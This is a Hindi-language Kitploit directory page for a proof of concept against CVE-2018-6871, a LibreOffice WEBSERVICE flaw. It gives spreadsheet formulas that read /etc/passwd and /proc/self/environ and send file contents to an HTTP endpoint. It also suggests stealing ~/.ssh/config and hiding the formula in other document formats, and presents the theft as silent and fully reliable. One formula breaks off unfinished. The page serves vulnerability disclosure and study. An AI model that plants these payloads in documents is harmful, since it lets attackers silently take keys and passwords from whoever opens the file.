Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
libreoffice-remote-arbitrary-file-disclosure — लिब्रेऑफिस रिमोट मनमानी फ़ाइल प्रकटीकरण भेद्यता का प्रमाण-अवधारणा | Kitploit
उपकरण/GitHubGitHub/jollheef/libreoffice-remote-arbitrary-file-disclosure
भेद्यता विश्लेषणशोषणडेटा निष्कासनजानकारी एकत्र करना
GitHubjollheef/libreoffice-remote-arbitrary-file-disclosure

libreoffice-remote-arbitrary-file-disclosure

लिब्रेऑफिस रिमोट मनमानी फ़ाइल प्रकटीकरण भेद्यता का प्रमाण-अवधारणा

रिपॉजिटरी देखें
96938 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता विवरण

CVE-2018-6871

पहला भाग

LibreOffice COM.MICROSOFT.WEBSERVICE फ़ंक्शन का समर्थन करता है:

root@kitploit:~
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

यह फ़ंक्शन URL से डेटा प्राप्त करने के लिए आवश्यक है, जिसे आमतौर पर इस प्रकार उपयोग किया जाता है:

root@kitploit:~
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

मूल में:

root@kitploit:~
जो प्रोटोकॉल समर्थित नहीं हैं, जैसे कि ftp: // या file: //, उनके लिए WEBSERVICE #VALUE! त्रुटि मान लौटाता है।

LibreOffice में, 5.4.5/6.0.1 से पहले ये प्रतिबंध लागू नहीं किए गए हैं।

दूसरा भाग

डिफ़ॉल्ट रूप से सेल अपडेट नहीं होते हैं, लेकिन यदि आप ~error जैसा सेल प्रकार निर्दिष्ट करते हैं, तो दस्तावेज़ खोलने पर सेल अपडेट हो जाएगा।

शोषण

फ़ाइल पढ़ने के लिए आपको बस यह चाहिए:

root@kitploit:~
=WEBSERVICE("/etc/passwd")

इस फ़ंक्शन का उपयोग फ़ाइल भेजने के लिए भी किया जा सकता है:

root@kitploit:~
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

सफल संचालन के लिए, आपको वर्तमान उपयोगकर्ता की फ़ाइलें भेजनी होंगी, इसलिए आपको वर्तमान उपयोगकर्ता का होम पथ प्राप्त करना होगा।

root@kitploit:~
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

आप अन्य फ़ाइलों को भी पार्स कर सकते हैं, जैसे ~/.ssh/config या उसी प्रकार की कोई चीज़।

LibreOffice Calc प्रारूपों के अलावा अन्य के लिए, आपको बस calc ऑब्जेक्ट को अन्य दस्तावेज़ में एम्बेड करना होगा (मैंने जाँच लिया है कि यह काम करता है)।

प्रभाव

कुंजियों, पासवर्ड और किसी भी अन्य चीज़ के साथ किसी भी फ़ाइल को भेजना आसान है। 100% सफलता दर, बिल्कुल मौन, सभी ऑपरेटिंग सिस्टम (GNU/Linux, MS Windows, macOS आदि) में 5.4.5/6.0.1 से पहले के LibreOffice को प्रभावित करता है और LO द्वारा समर्थित लगभग सभी प्रारूपों में एम्बेड किया जा सकता है।

आभार

यह भेद्यता मेरे द्वारा (@jollheef) और Ronnie Goodrich && Andrew Krasichkov द्वारा स्वतंत्र रूप से पाई गई थी (LibreOffice टीम के नोट्स के अनुसार)।

टूल डाउनलोड करें